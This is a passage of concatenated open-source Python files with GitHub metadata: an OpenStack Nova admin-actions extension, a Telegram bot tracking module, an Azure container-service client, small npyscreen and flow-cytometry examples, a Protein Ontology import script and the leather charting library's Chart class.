rotation = entity["rotation"]
except KeyError as missing_key:
msg = _("createBackup entity requires %s attribute") % missing_key
raise exc.HTTPBadRequest(explanation=msg)
except TypeError:
msg = _("Malformed createBackup entity")
raise exc.HTTPBadRequest(explanation=msg)
try:
rotation = utils.validate_integer(rotation, "rotation",
min_value=0)
except exception.InvalidInput as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id)
try:
image = self.compute_api.backup(context, instance, image_name,
backup_type, rotation, extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createBackup', id)
except exception.InvalidRequest as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
resp = webob.Response(status_int=202)
# build location of newly-created image entity if rotation is not zero
if rotation > 0:
image_id = str(image['id'])
image_ref = common.url_join(req.application_url, 'images',
image_id)
resp.headers['Location'] = image_ref
return resp
@wsgi.action('os-migrateLive')
def _migrate_live(self, req, id, body):
"""Permit admins to (live) migrate a server to a new host."""
context = req.environ["nova.context"]
authorize(context, 'migrateLive')
try:
block_migration = body["os-migrateLive"]["block_migration"]
disk_over_commit = body["os-migrateLive"]["disk_over_commit"]
host = body["os-migrateLive"]["host"]
except (TypeError, KeyError):
msg = _("host, block_migration and disk_over_commit must "
"be specified for live migration.")
raise exc.HTTPBadRequest(explanation=msg)
try:
block_migration = strutils.bool_from_string(block_migration,
strict=True)
disk_over_commit = strutils.bool_from_string(disk_over_commit,
strict=True)
except ValueError as err:
raise exc.HTTPBadRequest(explanation=six.text_type(err))
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.live_migrate(context, instance, block_migration,
disk_over_commit, host)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.InvalidCPUInfo,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.MigrationPreCheckError) as ex:
raise exc.HTTPBadRequest(explanation=ex.format_message())
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'os-migrateLive', id)
except Exception:
if host is None:
msg = _("Live migration of instance %s to another host "
"failed") % id
else:
msg = _("Live migration of instance %(id)s to host %(host)s "
"failed") % {'id': id, 'host': host}
LOG.exception(msg)
# Return messages from scheduler
raise exc.HTTPInternalServerError(explanation=msg)
return webob.Response(status_int=202)
@wsgi.action('os-resetState')
def _reset_state(self, req, id, body):
"""Permit admins to reset the state of a server."""
context = req.environ["nova.context"]
authorize(context, 'resetState')
# Identify the desired state from the body
try:
state = state_map[body["os-resetState"]["state"]]
except (TypeError, KeyError):
msg = _("Desired state must be specified. Valid states "
"are: %s") % ', '.join(sorted(state_map.keys()))
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id)
try:
instance.vm_state = state
instance.task_state = None
instance.save(admin_state_reset=True)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::resetState %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
class Admin_actions(extensions.ExtensionDescriptor):
"""Enable admin-only server actions
Actions include: pause, unpause, suspend, resume, migrate,
resetNetwork, injectNetworkInfo, lock, unlock, createBackup
"""
name = "AdminActions"
alias = "os-admin-actions"
namespace = "http://docs.openstack.org/compute/ext/admin-actions/api/v1.1"
updated = "2011-09-20T00:00:00Z"
def get_controller_extensions(self):
controller = AdminActionsController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| {
"content_hash": "ba4b0a370b413d000f68d47fb621f91b",
"timestamp": "",
"source": "github",
"line_count": 388,
"max_line_length": 79,
"avg_line_length": 42.121134020618555,
"alnum_prop": 0.6171449550266169,
"repo_name": "cernops/nova",
"id": "ebd3c43e80e13015e910a4c330089cdfab98deff",
"size": "16948",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/legacy_v2/contrib/admin_actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "983"
},
{
"name": "JavaScript",
"bytes": "2639"
},
{
"name": "Python",
"bytes": "17413087"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "295563"
}
],
"symlink_target": ""
} |
import datetime
from pony.orm import *
from pony import orm
from typing import Optional, Dict, Union
from ..core import HorseFaxBot, ModuleTools, BaseModule
from ..db import db
from horsefax.telegram.types import (Message, User, Chat, UsersJoinedMessage, UserLeftMessage, ChatMigrateFromIDMessage,
MessagePinnedMessage, TextMessage, TextEntity, PhotoMessage, StickerMessage,
VideoMessage, VideoNoteMessage, DocumentMessage, AudioMessage, PhotoSize)
class TelegramUser(db.Entity):
id = PrimaryKey(int)
username = orm.Optional(str, index=True, nullable=True)
first_name = Required(str)
last_name = orm.Optional(str, nullable=True)
language_code = orm.Optional(str, nullable=True)
chats = Set('TelegramChat')
sent_messages = Set('TelegramMessage', reverse="sender")
forwarded_messages = Set('TelegramMessage', reverse="forward_from")
# for groups module
ping_groups = Set('PingGroup')
def to_user(self):
return User({'id': self.id,
'username': self.username,
'first_name': self.first_name,
'last_name': self.last_name,
'language_code': self.language_code})
class TelegramChat(db.Entity):
id = PrimaryKey(int, size=64)
type = Required(Chat.Type, index=True)
title = orm.Optional(str, nullable=True)
all_members_are_administrators = Required(bool)
users = Set(TelegramUser)
pinned_message = orm.Optional(int)
messages = Set('TelegramMessage', reverse="chat")
class TelegramMessage(db.Entity):
id = Required(int)
chat = Required(TelegramChat)
sender = Required(TelegramUser, reverse="sent_messages")
date = Required(datetime.datetime, index=True)
forward_from = orm.Optional(TelegramUser, reverse="forwarded_messages")
reply_to = orm.Optional('TelegramMessage')
replies = Set('TelegramMessage')
edit_date = orm.Optional(datetime.datetime)
PrimaryKey(chat, id)
class TelegramTextMessage(TelegramMessage):
text = Required(str)
entities = Required(Json)
class FileMessage(TelegramMessage):
file_id = Required(str)
mime_type = orm.Optional(str, nullable=True)
file_size = orm.Optional(int)
caption = orm.Optional(str, nullable=True)
thumbnail = orm.Optional(str, nullable=True)
class VisualMessage(FileMessage):
width = Required(int)
height = Required(int)
class LongMessage(FileMessage):
duration = Required(int)
class TelegramPhotoMessage(VisualMessage):
pass
class TelegramStickerMessage(VisualMessage):
emoji = orm.Optional(str, nullable=True)
class TelegramVideoMessage(LongMessage, VisualMessage):
pass
class TelegramVideoNoteMessage(LongMessage, VisualMessage):
pass
class TelegramDocumentMessage(FileMessage):
file_name = orm.Optional(str, nullable=True)
class TelegramAudioMessage(LongMessage):
performer = orm.Optional(str, nullable=True)
title = orm.Optional(str, nullable=True)
class TrackingModule(BaseModule):
def __init__(self, bot: HorseFaxBot, util: ModuleTools) -> None:
self.bot = bot
self.util = util
self.bot.telegram.register_handler("message", self.handle_message)
@db_session
def handle_message(self, message: Message) -> None:
# Track members
origin = message.sender
self.update_user(origin)
if message.forward_from and isinstance(message.forward_from, User):
self.update_user(message.forward_from)
if message.reply_to_message:
self.handle_message(message.reply_to_message)
if isinstance(message, TextMessage):
for entity in message.entities:
if entity.user is not None:
self.update_user(entity.user)
# Track chats
self.update_chat(message.chat)
TelegramChat[message.chat.id].users.add(TelegramUser[origin.id])
if isinstance(message, UsersJoinedMessage):
for user in message.users:
self.update_user(user)
TelegramChat[message.chat.id].users.add(TelegramUser[user.id])
if isinstance(message, UserLeftMessage):
self.update_user(message.user)
TelegramChat[message.chat.id].users.remove(TelegramUser[message.user.id])
if isinstance(message, MessagePinnedMessage):
TelegramChat[message.chat.id].pinned_message = message.message.message_id
if isinstance(message, ChatMigrateFromIDMessage):
TelegramChat[message.chat.id].users.add(TelegramChat[message.id].users)
TelegramChat[message.id].users.clear()
if TelegramMessage.get(id=message.message_id):
return
# Handle logging
log_params = {'id': message.message_id,
'sender': TelegramUser[message.sender.id],
'date': message.date,
'chat': TelegramChat[message.chat.id],
'forward_from': TelegramUser[message.forward_from.id] if message.forward_from else None,
'reply_to': TelegramMessage.get(id=message.reply_to_message.message_id) if message.reply_to_message is not None else None,
'edit_date': message.edit_date}
if isinstance(message, TextMessage):
TelegramTextMessage(text=message.text,
entities=[self._json_from_entity(x) for x in message.entities],
**log_params)
elif isinstance(message, PhotoMessage):
big_photo = max(message.photo, key=lambda x: x.width * x.height) # type: PhotoSize
if len(message.photo) > 1:
small_photo = min(message.photo, key=lambda x: x.width * x.height) # type: PhotoSize
thumb = small_photo.file_id
else:
thumb = None
TelegramPhotoMessage(file_id=big_photo.file_id, file_size=big_photo.file_size, width=big_photo.width,
height=big_photo.height, caption=message.caption, mime_type="image/jpeg",
thumbnail=thumb, **log_params)
elif isinstance(message, StickerMessage):
TelegramStickerMessage(file_id=message.file_id, file_size=message.file_size, mime_type="image/webp",
width=message.width, height=message.height, emoji=message.emoji, **log_params)
elif isinstance(message, VideoMessage):
TelegramVideoMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
width=message.width, height=message.height, duration=message.duration,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
caption=message.caption, **log_params)
elif isinstance(message, VideoNoteMessage):
TelegramVideoNoteMessage(file_id=message.file_id, file_size=message.file_size, mime_type="video/mp4",
width=message.length, height=message.length,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
duration=message.duration, **log_params)
elif isinstance(message, DocumentMessage):
TelegramDocumentMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
caption=message.caption, file_name=message.file_name, **log_params)
elif isinstance(message, AudioMessage):
TelegramAudioMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
performer=message.performer, title=message.title, **log_params)
def update_chat(self, chat: Chat):
try:
TelegramChat[chat.id].set(title=chat.title, type=chat.type,
all_members_are_administrators=chat.all_members_are_administrators)
except ObjectNotFound:
TelegramChat(id=chat.id, type=chat.type, title=chat.title,
all_members_are_administrators=chat.all_members_are_administrators)
@db_session
def update_user(self, user: User):
try:
TelegramUser[user.id].set(username=user.username, first_name=user.first_name,
last_name=user.last_name, language_code=user.language_code)
except ObjectNotFound:
TelegramUser(id=user.id, username=user.username,
first_name=user.first_name, last_name=user.last_name,
language_code=user.language_code)
@db_session
def user_by_username(self, username: str) -> Optional[User]:
user = TelegramUser.get(username=username)
if user is None:
return None
return user.to_user()
def _json_from_entity(self, entity: TextEntity) -> Dict[str, Union[str, int]]:
ret = {
'type': entity.type.value,
'offset': entity.offset,
'length': entity.length,
}
if entity.url:
ret['url'] = entity.url
if entity.user:
ret['user'] = entity.user.id
return ret
| {
"content_hash": "40c1b6a28f5a8030da16845632d9741e",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 144,
"avg_line_length": 42.65022421524664,
"alnum_prop": 0.6260119861213332,
"repo_name": "TallonRain/horsefaxbot",
"id": "ced7ea31abd543710e88900f7dac0c85145ab1c2",
"size": "9511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "horsefax/bot/modules/tracking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54475"
}
],
"symlink_target": ""
} |
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.container_services_operations import ContainerServicesOperations
from .operations.managed_clusters_operations import ManagedClustersOperations
from . import models
class ContainerServiceClientConfiguration(AzureConfiguration):
"""Configuration for ContainerServiceClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Subscription credentials which uniquely identify
Microsoft Azure subscription. The subscription ID forms part of the URI
for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not base_url:
base_url = 'https://management.azure.com'
super(ContainerServiceClientConfiguration, self).__init__(base_url)
self.add_user_agent('azure-mgmt-containerservice/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
class ContainerServiceClient(object):
"""The Container Service Client.
:ivar config: Configuration for client.
:vartype config: ContainerServiceClientConfiguration
:ivar container_services: ContainerServices operations
:vartype container_services: azure.mgmt.containerservice.operations.ContainerServicesOperations
:ivar managed_clusters: ManagedClusters operations
:vartype managed_clusters: azure.mgmt.containerservice.operations.ManagedClustersOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Subscription credentials which uniquely identify
Microsoft Azure subscription. The subscription ID forms part of the URI
for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
self.config = ContainerServiceClientConfiguration(credentials, subscription_id, base_url)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.container_services = ContainerServicesOperations(
self._client, self.config, self._serialize, self._deserialize)
self.managed_clusters = ManagedClustersOperations(
self._client, self.config, self._serialize, self._deserialize)
| {
"content_hash": "2daae1c14a5b1afad338dcf7c1135194",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 99,
"avg_line_length": 42.782051282051285,
"alnum_prop": 0.7329937069223854,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "a1c73e58daf58606fed329d20761f6a5f5bf402b",
"size": "3811",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-containerservice/azure/mgmt/containerservice/container_service_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import npyscreen
class TestApp(npyscreen.NPSApp):
def main(self):
# These lines create the form and populate it with widgets.
# A fairly complex screen in only 8 or so lines of code - a line for each control.
npyscreen.setTheme(npyscreen.Themes.ColorfulTheme)
F = npyscreen.SplitForm(name = "Welcome to Npyscreen",)
t = F.add(npyscreen.Textfield, name = "Text:", )
t1 = F.add(npyscreen.TitleText, name = "Text:", )
t2 = F.add(npyscreen.TitleMultiSelect, name="Testing", values=range(200))
# This lets the user play with the Form.
F.edit()
if __name__ == "__main__":
App = TestApp()
App.run()
| {
"content_hash": "2b186a29496cb29d1407fe7b72ee50a6",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 90,
"avg_line_length": 39.88235294117647,
"alnum_prop": 0.6297935103244838,
"repo_name": "t1g0r/npyscreen",
"id": "c0ea2aef1804a4688d18ba3142e6321eee40f93c",
"size": "700",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "TESTING-RESIZE.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "17"
},
{
"name": "HTML",
"bytes": "26473"
},
{
"name": "Makefile",
"bytes": "4634"
},
{
"name": "Perl",
"bytes": "14592"
},
{
"name": "PowerShell",
"bytes": "8252"
},
{
"name": "Python",
"bytes": "1252129"
},
{
"name": "Shell",
"bytes": "12930"
}
],
"symlink_target": ""
} |
"""
Demonstrates how to implement a custom transformation of the data.
"""
import os
import FlowCytometryTools
from FlowCytometryTools import FCMeasurement
from pylab import *
# Locate sample data included with this package
datadir = os.path.join(FlowCytometryTools.__path__[0], 'tests', 'data', 'Plate01')
datafile = os.path.join(datadir, 'RFP_Well_A3.fcs')
# datafile = '[insert path to your own fcs file]'
def transform_using_this_method(original_sample):
""" This function implements a log transformation on the data. """
# Copy the original sample
new_sample = original_sample.copy()
new_data = new_sample.data
# Our transformation goes here
new_data['Y2-A'] = log(new_data['Y2-A'])
new_data = new_data.dropna() # Removes all NaN entries
new_sample.data = new_data
return new_sample
# Load data
sample = FCMeasurement(ID='Test Sample', datafile=datafile)
# Transform using our own custom method
custom_transform_sample = sample.apply(transform_using_this_method)
###
# To do this with a collection (a plate):
# compensated_plate = plate.apply(transform_using_this_method,
# output_format='collection')
# Plot
custom_transform_sample.plot(['Y2-A'], color='green', alpha=0.9);
grid(True)
title('Custom log transformation')
# show() # <-- Uncomment when running as a script.
| {
"content_hash": "ee3a7e00111b33d0a4050348aa249eca",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 82,
"avg_line_length": 28.638297872340427,
"alnum_prop": 0.7080237741456167,
"repo_name": "eyurtsev/FlowCytometryTools",
"id": "566d87a14ba1a5038098fbb2f4da353f2089c89b",
"size": "1346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/source/pyplots/arbitrary_manipulation/transformation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "7195"
},
{
"name": "Jupyter Notebook",
"bytes": "330726"
},
{
"name": "Python",
"bytes": "204129"
}
],
"symlink_target": ""
} |
import os
import re
import csv
import obonet
import pickle
from collections import Counter
def get_synonyms(syns_entry):
synonyms = []
for synonym in syns_entry:
match = re.match(r'^\"(.+)\" (EXACT|RELATED|NARROW|BROAD)',
synonym)
syn, status = match.groups()
if status in allowed_synonyms:
synonyms.append(syn)
return synonyms
def length_filter(txt):
# We filter out single-character names and names that are very long
# and so are unlikely to be ever found in text
return 2 <= len(txt) <= 50
def character_filter(txt):
cnt = Counter([c for c in txt])
special_chars = {'(', ')', '[', ']', '{', '}', ','}
num_special_chars = sum(cnt.get(c, 0) for c in special_chars)
return num_special_chars < 6
def mod_filter(txt):
return "MOD:" not in txt
def is_derived_from(pro_id, data):
if not re.match(r'^PR:(\d+)$', pro_id):
return False
relationship = data.get('relationship', [])
if any(re.match(r'derives\_from PR:', rel) for rel in relationship):
return True
return False
def isa_cleavage_product(pro_id, data, g):
isa = data.get('is_a', [])
for node_id in isa:
if 'proteolytic cleavage product' in g.nodes[node_id]['name']:
return True
return False
def is_cleavage_and_modification(data):
comments = data.get('comment')
definition = data.get('def')
if comments is None or definition is None:
return False
return re.match(r'Category\=modification', comments) and ('cleavage' in definition)
def accept_entry(name, synonym, pro_id, data):
# Sanity check filters
if not (length_filter(synonym) and character_filter(synonym) and \
mod_filter(synonym)):
return False
# Remove entries like "YWHAB/ClvPrd", these are not useful
# synonyms
if re.match(r'^([^/]+)/(ClvPrd|UnMod|iso:\d+/UnMod)$', synonym):
return False
# Remove synonyms like UniProtKB:P0DTD1, 5325-5925
if re.match(r'^UniProtKB:([^ ]+)', synonym):
return False
# Finds guaranteed protein cleavages from relationship tag
if is_derived_from(pro_id, data):
return True
# Experimental Filter for finding additional cleavages
if is_cleavage_and_modification(data):
return True
if isa_cleavage_product(pro_id, data, g):
return True
return False
def read_cached_url(url, cache_file):
if not os.path.exists(cache_file):
print('Loading %s' % url)
g = obonet.read_obo(url)
with open(cache_file, 'wb') as fh:
pickle.dump(g, fh)
return g
else:
print('Loading %s' % cache_file)
with open(cache_file, 'rb') as fh:
return pickle.load(fh)
if __name__ == '__main__':
# Basic positioning
here = os.path.dirname(os.path.abspath(__file__))
kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',
'clulab', 'reach', 'kb')
resource_fname = os.path.join(kb_dir, 'protein-ontology-fragments.tsv')
# Download Protein Ontology resource file
url = 'https://proconsortium.org/download/current/pro_reasoned.obo'
g = read_cached_url(url, 'pro_obo.pkl')
allowed_synonyms = {'EXACT', 'RELATED'}
entries = []
for node, data in g.nodes(data=True):
name = data['name']
pro_id = node
raw_synonyms = data.get('synonym', [])
synonyms = get_synonyms(raw_synonyms)
# Format of the output defined here
entries += [(txt, pro_id) for txt in ([name] + synonyms)
if accept_entry(name, txt, pro_id, data)]
# We sort the entries first by the synonym but in a way that special
# characters and capitalization is ignored, then sort by ID
entries = sorted(entries, key=(lambda x:
(re.sub('[^A-Za-z0-9]', '', x[0]).lower(),
x[1])))
# Now dump the entries into an updated TSV file
with open(resource_fname, 'w', newline='') as fh:
writer = csv.writer(fh, delimiter="\t")
for entry in entries:
writer.writerow(entry)
| {
"content_hash": "1f407d885dd5c1181e3edb47ac80a300",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 87,
"avg_line_length": 29.055172413793102,
"alnum_prop": 0.597911227154047,
"repo_name": "clulab/bioresources",
"id": "a863240b507606eec6c16ab1068cb0a1d69828b1",
"size": "4213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/update_protein_ontology.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Scala",
"bytes": "1941"
},
{
"name": "Shell",
"bytes": "675"
}
],
"symlink_target": ""
} |
from copy import copy
import os
import xml.etree.ElementTree as ET
import six
from leather.axis import Axis
from leather.data_types import Date, DateTime
from leather.scales import Scale, Linear, Temporal
from leather.series import Series, CategorySeries
from leather.shapes import Bars, Columns, Dots, Line
import leather.svg as svg
from leather import theme
from leather.utils import X, Y, DIMENSION_NAMES, Box, IPythonSVG, warn
class Chart(object):
"""
Container for all chart types.
:param title:
An optional title that will be rendered at the top of the chart.
"""
def __init__(self, title=None):
self._title = title
self._series_colors = theme.default_series_colors
self._layers = []
self._types = [None, None]
self._scales = [None, None]
self._axes = [None, None]
def _palette(self):
"""
Return a generator for series colors.
"""
return (color for color in self._series_colors)
def set_x_scale(self, scale):
"""
Set the X :class:`.Scale` for this chart.
"""
self._scales[X] = scale
def set_y_scale(self, scale):
"""
See :meth:`.Chart.set_x_scale`.
"""
self._scales[Y] = scale
def add_x_scale(self, domain_min, domain_max):
"""
Create and add a :class:`.Scale`.
If the provided domain values are :class:`date` or :class:`datetime`
then a :class:`.Temporal` scale will be created, otherwise it will
:class:`.Linear`.
If you want to set a custom scale class use :meth:`.Chart.set_x_scale`
instead.
"""
scale_type = Linear
if isinstance(domain_min, Date.types) or isinstance(domain_min, DateTime.types):
scale_type = Temporal
self.set_x_scale(scale_type(domain_min, domain_max))
def add_y_scale(self, domain_min, domain_max):
"""
See :meth:`.Chart.add_x_scale`.
"""
scale_type = Linear
if isinstance(domain_min, Date.types) or isinstance(domain_min, DateTime.types):
scale_type = Temporal
self.set_y_scale(scale_type(domain_min, domain_max))
def set_x_axis(self, axis):
"""
Set an :class:`.Axis` class for this chart.
"""
self._axes[X] = axis
def set_y_axis(self, axis):
"""
See :meth:`.Chart.set_x_axis`.
"""
self._axes[Y] = axis
def add_x_axis(self, ticks=None, tick_formatter=None, name=None):
"""
Create and add an X :class:`.Axis`.
If you want to set a custom axis class use :meth:`.Chart.set_x_axis`
instead.
"""
self._axes[X] = Axis(ticks, tick_formatter, name)
def add_y_axis(self, ticks=None, tick_formatter=None, name=None):
"""
See :meth:`.Chart.add_x_axis`.
"""
self._axes[Y] = Axis(ticks, tick_formatter, name)
def add_series(self, series, shape):
"""
Add a data :class:`.Series` to the chart. The data types of the new
series must be consistent with any series that have already been added.
There are several shortcuts for adding different types of data series.
See :meth:`.Chart.add_bars`, :meth:`.Chart.add_columns`,
:meth:`.Chart.add_dots`, and :meth:`.Chart.add_line`.
"""
if self._layers and isinstance(self._layers[0][0], CategorySeries):
raise RuntimeError('Additional series can not be added to a chart with a CategorySeries.')
if isinstance(series, CategorySeries):
self._types = series._types
else:
for dim in [X, Y]:
if not self._types[dim]:
self._types[dim] = series._types[dim]
elif series._types[dim] is not self._types[dim]:
raise TypeError('Can\'t mix axis-data types: %s and %s' % (series._types[dim], self._types[dim]))
shape.validate_series(series)
self._layers.append((
series,
shape
))
def add_bars(self, data, x=None, y=None, name=None, fill_color=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Bars`.
Note that when creating bars in this way the order of the series data
will be reversed so that the first item in the series is displayed
as the top-most bar in the graphic. If you don't want this to happen
use :meth:`.Chart.add_series` instead.
"""
self.add_series(
Series(list(reversed(data)), x=x, y=y, name=name),
Bars(fill_color)
)
def add_columns(self, data, x=None, y=None, name=None, fill_color=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Columns`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Columns(fill_color)
)
def add_dots(self, data, x=None, y=None, name=None, fill_color=None, radius=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Dots`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Dots(fill_color, radius)
)
def add_line(self, data, x=None, y=None, name=None, stroke_color=None, width=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Line`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Line(stroke_color, width)
)
def _validate_dimension(self, dimension):
"""
Validates that the given scale and axis are valid for the data that
has been added to this chart. If a scale or axis has not been set,
generates automated ones.
"""
scale = self._scales[dimension]
axis = self._axes[dimension]
if not scale:
scale = Scale.infer(self._layers, dimension, self._types[dimension])
else:
for series, shape in self._layers:
if not scale.contains(series.min(dimension)) or not scale.contains(series.max(dimension)):
d = DIMENSION_NAMES[dimension]
warn('Data contains values outside %s scale domain. All data points may not be visible on the chart.' % d)
# Only display once per axis
break
if not axis:
axis = Axis()
return (scale, axis)
def to_svg_group(self, width=None, height=None):
"""
Render this chart to an SVG group element.
This can then be placed inside an :code:`<svg>` tag to make a complete
SVG graphic.
See :meth:`.Chart.to_svg` for arguments.
"""
width = width or theme.default_width
height = height or theme.default_height
if not self._layers:
raise ValueError('You must add at least one series to the chart before rendering.')
if isinstance(theme.margin, float):
default_margin = width * theme.margin
margin = Box(
top=default_margin,
right=default_margin,
bottom=default_margin,
left=default_margin
)
elif isinstance(margin, int):
margin = Box(margin, margin, margin, margin)
elif not isinstance(margin, Box):
margin = Box(*margin)
# Root / background
root_group = ET.Element('g')
root_group.append(ET.Element('rect',
x=six.text_type(0),
y=six.text_type(0),
width=six.text_type(width),
height=six.text_type(height),
fill=theme.background_color
))
# Margins
margin_group = ET.Element('g')
margin_group.set('transform', svg.translate(margin.left, margin.top))
margin_width = width - (margin.left + margin.right)
margin_height = height - (margin.top + margin.bottom)
root_group.append(margin_group)
# Header
header_group = ET.Element('g')
header_margin = 0
if self._title:
label = ET.Element('text',
x=six.text_type(0),
y=six.text_type(0),
fill=theme.title_color
)
label.set('font-family', theme.title_font_family)
label.set('font-size', six.text_type(theme.title_font_size))
label.text = six.text_type(self._title)
header_group.append(label)
header_margin += theme.title_font_char_height + theme.title_gap
# Legend
if len(self._layers) > 1 or isinstance(self._layers[0][0], CategorySeries):
legend_group = ET.Element('g')
legend_group.set('transform', svg.translate(0, header_margin))
indent = 0
rows = 1
palette = self._palette()
for series, shape in self._layers:
for item_group, item_width in shape.legend_to_svg(series, palette):
if indent + item_width > width:
indent = 0
rows += 1
y = (rows - 1) * (theme.legend_font_char_height + theme.legend_gap)
item_group.set('transform', svg.translate(indent, y))
indent += item_width
legend_group.append(item_group)
legend_height = rows * (theme.legend_font_char_height + theme.legend_gap)
header_margin += legend_height
header_group.append(legend_group)
margin_group.append(header_group)
# Body
body_group = ET.Element('g')
body_group.set('transform', svg.translate(0, header_margin))
body_width = margin_width
body_height = margin_height - header_margin
margin_group.append(body_group)
# Axes
x_scale, x_axis = self._validate_dimension(X)
y_scale, y_axis = self._validate_dimension(Y)
bottom_margin = x_axis.estimate_label_margin(x_scale, 'bottom')
left_margin = y_axis.estimate_label_margin(y_scale, 'left')
canvas_width = body_width - left_margin
canvas_height = body_height - bottom_margin
axes_group = ET.Element('g')
axes_group.set('transform', svg.translate(left_margin, 0))
axes_group.append(x_axis.to_svg(canvas_width, canvas_height, x_scale, 'bottom'))
axes_group.append(y_axis.to_svg(canvas_width, canvas_height, y_scale, 'left'))
header_group.set('transform', svg.translate(left_margin, 0))
body_group.append(axes_group)
# Series
series_group = ET.Element('g')
palette = self._palette()
for series, shape in self._layers:
series_group.append(shape.to_svg(canvas_width, canvas_height, x_scale, y_scale, series, palette))
axes_group.append(series_group)
return root_group
def to_svg(self, path=None, width=None, height=None):
"""
Render this chart to an SVG document.
The :code:`width` and :code:`height` are specified in SVG's
"unitless" units, however, it is usually convenient to specify them
as though they were pixels.
:param path:
Filepath or file-like object to write to. If omitted then the SVG
will be returned as a string. If running within IPython, then this
will return a SVG object to be displayed.
:param width:
The output width, in SVG user units. Defaults to
:data:`.theme.default_chart_width`.
:param height:
The output height, in SVG user units. Defaults to
:data:`.theme.default_chart_height`.
"""
width = width or theme.default_chart_width
height = height or theme.default_chart_height
root = ET.Element('svg',
width=six.text_type(width),
height=six.text_type(height),
version='1.1',
xmlns='http://www.w3.org/2000/svg'
)
group = self.to_svg_group(width, height)
root.append(group)
svg_text = svg.stringify(root)
close = True
if path:
f = None
try:
if hasattr(path, 'write'):
f = path
close = False
else:
dirpath = os.path.dirname(path)
if dirpath and not os.path.exists(dirpath):
os.makedirs(dirpath)
f = open(path, 'w')
f.write(svg.HEADER)
f.write(svg_text)
finally:
if close and f is not None:
f.close()
else:
return IPythonSVG(svg_text)
| {
"content_hash": "e46c7b7d0cbf777431724e75db07c774",
"timestamp": "",
"source": "github",
"line_count": 394,
"max_line_length": 126,
"avg_line_length": 32.66243654822335,
"alnum_prop": 0.5595617375087419,
"repo_name": "onyxfish/leather",
"id": "e27218344a8e4d2d09a291c9f41e6943e31a9834",
"size": "12892",
"binary": false,
"copies": "2",
